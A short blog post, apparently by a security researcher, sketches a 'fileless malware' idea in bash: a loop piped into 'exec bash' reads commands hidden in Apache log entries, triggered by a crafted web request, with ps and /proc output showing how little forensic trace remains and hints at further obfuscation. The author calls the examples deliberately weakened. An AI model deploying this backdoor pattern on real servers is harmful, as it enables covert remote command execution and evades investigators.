2022-09-19 00:00:00
By Tim Brown
Had some fun today, playing with ideas for fileless malware in bash. The general premise of this idea is that we can start a background process that sits, monitors an existing log file and then executes code based on what appears in the logs. For example, consider the following:</p>
<pre>$ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log | cut -f 2 -d \"~\" | tr '_' ' '; done" | exec bash</pre>
<p>Now, what happens if we make a request to the corresponding web server:</p>
<pre>$ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~'</pre>
<p>As far as forensic artefacts, there's not much to go on:</p>
<pre>$ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~' $ ps -aef
...
root 10680 10679 0 21:27 pts/1 00:00:00 /bin/bash
root 11125 10680 17 21:27 pts/1 00:00:02 bash
...
$ ls /proc/11125/fd
total 0
dr-x------ 2 root root 0 Jun 28 21:27 .
dr-xr-xr-x 9 root root 0 Jun 28 21:27 ..
lr-x------ 1 root root 64 Jun 28 21:28 0 -> pipe:[290558013]
lrwx------ 1 root root 64 Jun 28 21:28 1 -> /dev/pts/1
lrwx------ 1 root root 64 Jun 28 21:27 2 -> /dev/pts/1
$ cat /proc/11125/cmdline
bash
$ cat /proc/11125/cwd
/root</pre>
<p>Things like exec/disown/patterns/eval add some fun options for further obfuscation...</p>
<p>Note that the examples given here are somewhat is nobbled. Just in case anyone is confused, the point is rather the "| exec bash" rather than the payload specifics.
Mood: Red
Music: Nothing playing right now
You are unknown, comment